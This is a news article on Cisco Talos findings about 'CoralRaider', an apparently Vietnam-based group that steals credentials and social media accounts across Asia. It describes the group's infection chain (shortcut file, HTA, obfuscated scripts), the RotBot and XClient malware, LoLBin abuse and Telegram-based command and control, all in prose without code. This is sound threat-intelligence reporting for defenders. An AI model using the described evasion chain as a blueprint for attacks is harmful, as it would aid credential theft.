A new financially motivated threat actor believed to be of Vietnamese origin is targeting victims across various Asian and Southeast Asian countries to steal credentials, financial data, and social media accounts, including business and advertisement accounts.

Dubbed “CoralRaider,” the threat actor has been active since at least 2023, according to Cisco’s Talos threat intelligence team. The malicious campaign, spotted by the researchers, is focused on multiple countries in Asia and Southeast Asia, including India, China, South Korea, Bangladesh, Pakistan, Indonesia and Vietnam.

The group employs sophisticated techniques and utilizes specific tools such as RotBot, a customized variant of QuasarRAT, and the XClient stealer as payloads in their campaigns.

CoralRaider’s tactics also include the dead drop technique, involving the abuse of legitimate services to host configuration files and employing uncommon living-off-the-land binaries (LoLBins) like Windows Forfiles.exe and FoDHelper.exe. This technique helps the threat actor evade detection and complicate mitigation efforts.

Based on the group’s Telegram command-and-control (C2) bot channels, language preferences, and the presence of Vietnamese words hardcoded in their payload binaries, Talos believes that the CoralRaider operators are based in Vietnam.

Further investigation into CoralRaider's operations revealed their involvement in underground markets facilitated through Vietnamese-language Telegram groups that serve as platforms for trading victim data and other illicit activities.

The attack starts with a malicious Windows shortcut file, which downloads and executes an HTML application file (HTA) from an attacker-controlled server. Subsequently, a sequence of obfuscated Visual Basic and PowerShell scripts are executed, leading to the deployment of RotBot and XClient onto the victim's system.

Upon execution, RotBot conducts detection evasion checks and system reconnaissance before connecting to a legitimate domain controlled by the threat actor to download the configuration file for C2 communication, primarily conducted through Telegram bots.

Once connected to the Telegram C2 bot, RotBot loads the XClient stealer payload into the victim's memory, initiating a series of actions aimed at collecting sensitive information from the victim's browser, social media accounts, and applications such as Telegram and Discord. Screenshots of the victim's desktop are captured and exfiltrated along with collected data to the attacker's Telegram bot.